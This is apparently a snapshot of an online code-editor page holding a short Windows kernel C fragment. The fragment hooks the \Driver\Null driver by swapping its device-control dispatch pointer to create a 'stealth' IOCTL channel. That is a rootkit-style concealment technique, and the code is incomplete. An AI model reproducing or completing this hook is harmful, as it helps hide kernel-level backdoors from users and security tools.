SyferX Cloud
Synced to MySQL
Personal
Code
TODO
-
-
DB ID:
New
1
2
3
4
5
6
7
8
9
10
11
// Stealth IRP hook on \Driver\Null prototype NTSTATUS HookDriverNull(PDRIVER_OBJECT DriverObject) { UNICODE_STRING nullDriverName; RtlInitUnicodeString(&nullDriverName, L"\\Driver\\Null"); // Attempt to locate target driver PDRIVER_OBJECT TargetDriver = NULL; NTSTATUS status = ObReferenceObjectByName(&nullDriverName, OBJ_CASE_INSENSITIVE, NULL, 0, *IoDriverObjectType, KernelMode, NULL, (PVOID*)&TargetDriver); if (NT_SUCCESS(status)) { // Swap major function pointer for stealth IOCTL OriginalDeviceControl = TargetDriver->MajorFunction[IRP_MJ_DEVICE_CONTROL]; TargetDriver->MajorFunction[IRP_MJ_DEVICE_CONTROL] = HookedDeviceControl; ObDereferenceObject(TargetDriver); } return status; } // TODO: Need to handle MmGetPhysicalAddress transition to avoid page faults
Cloud Gallery
Upload Images
Server: Online
DB: Connected
Length: 642
|
Lines: 19
|
UTF-8